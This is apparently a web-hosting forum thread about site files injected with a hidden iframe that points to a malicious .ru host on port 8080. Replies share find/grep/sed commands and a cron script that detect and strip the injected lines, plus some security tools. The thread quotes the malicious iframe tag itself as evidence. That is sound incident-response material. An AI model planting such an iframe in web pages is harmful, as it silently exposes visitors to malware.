Server Hacked ..!

[Nelesh]

Server hacked.
============

HTML and PHP files

Inserted code

Quote:

" <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe> ".

Is there any way to find out all the hacked files on server, I was trying to find the infected files with the following command.

find * | xargs grep 'http://a5g.ru:8080'

Please help ...

[JPC-Howard]

Quote:

Originally Posted by Nelesh

Server hacked.
============

HTML and PHP files

Inserted code



Is there any way to find out all the hacked files on server, I was trying to find the infected files with the following command.

find * | xargs grep 'http://a5g.ru:8080'

Please help ...

If you need to find a list of files containing a specific string, you might try this as well.

grep -r --color a5g.ru *

[logicsupport]

Hi ,

Please use the following script
===============
find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5g.ru" {} \; -exec sed -i "/"a5g.ru"/d" {} \;
===============
The above command will remove the line which contains the word " a5g.ru " . The command will search all the files under /home

We are advising you to take necessary backups before running the above script

[Spiral]

Nelesh:

Be advised that this particular hack is NOT a server compromise
but rather an infected client. You should contact whoever owns
the account where the index files have been modified and let them
know that their home computer is infected with a pretty dangerous
trojan that records the keystrokes on their computer and captures
their passwords so that hackers in China can access their hosting
and (bad news) bank accounts.

They have been compromised for sure if someone has already
logged into their web hosting account and updated the index files
and they need to update their virus scanner with the latest updates
and perform a full system scan and also get a "good" spyware
detection program such as Spyware Doctor from PCTools.

A note to logicsupport:

The cleanup script is a nice idea but I would search for the proxy port
instead (:8080) of the URL as it is not likely to show up in regular home pages
and thus far has stayed consistent in hacked files on various servers while the
URL link frequently changes

Script for cronjob for general detection for this:

Code:

#!/bin/bash
IFS="$"

# Change to your administrator email address
ALERT="root"

# Location of Log file
HLOG="/var/log/china-hack.log"

# Location of temporary test report
TLIST="/tmp/hack-test.$$"

# --------------------------------------------------
#  Begin main China Hack Detection Script
# --------------------------------------------------

if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi

# User specific environment for cron job

typeset -i TCOUNT=0

PATH=$PATH:$HOME/bin:.
export PATH

cd /home

if [ -e ${TLIST} ]; then
  rm -f ${TLIST}
fi

ls /var/cpanel/users | while read MUSER; do
   find ./${MUSER}/public_html -type f -mtime -30 -name 'index.php' -o -name 'index.html' -o -name 'index.htm' >> ${TLIST}
done

cat ${TLIST} | while read HFILE; do
   TCOUNT=$(grep -c ':8080' ${HFILE})
   if [ ${TCOUNT} -gt 0 ]; then
     sed -i'.hack' "/"8080"/d" "${HFILE}"
     echo "$(date) ${HFILE}" >> ${HLOG}
     echo "${TCOUNT} ${HFILE}"
     echo "Potential China hack found in ${HFILE}" | mail -s "Alert: Potential China Hack Detected" '${ALERT}'
   fi
   TCOUNT=0
done

if [ -e ${TLIST} ]; then
  rm -f ${TLIST}
fi

#End of Script

[kraken17]

I have worked on this problem for the past 3 days, with only one account hacked on the server.

The problem has expanded to [A5H.ru] as well. Search your servers for anything :8080 inside all files.

Linux command :
find /home/ \( -name "*.cgi" -o -name "*.php" -o -name "*.html" \) -print0 | xargs -0 egrep -l 'ru:8080' >> /root/a5g_report &

will find anything placed into php,cgi and html files with this particular problem, looking for ru:8080. It will then place the filename of any infected files into /root/a5g_report.

Now is the time to keep effective backups of your website guys. Also do change the ftp password, but do not do it on a machine that may be infected, I change my users password and the gave it to the hackers again.

Typical.

[maquinadigital]

Greetings,

in last September, my server was hacked. At that time, it was not only one account but several.

I made some php scripts to run in sh, to detect and clean the files.

You can download them in www.maquinadigital.pt/scripts.tar.gz

Hope they can help someone.

Best regards
daniel

[ddmd]

Hey,

I had a similar problem a while ago and used the ossec tool (open source) to find all offending packages. It has a nice rootkit/worm/exploits detection tool in there....

After that, I kept that running with Snort and modsecurity (all open source) to monitor my systems. I lately also found sucuri to remotely check if my sites have been defaced, blacklisted, etc.

links:
Welcome to the Home of OSSEC
ModSecurity: Open Source Web Application Firewall
Snort :: Home Page
Sucuri information security (BETA)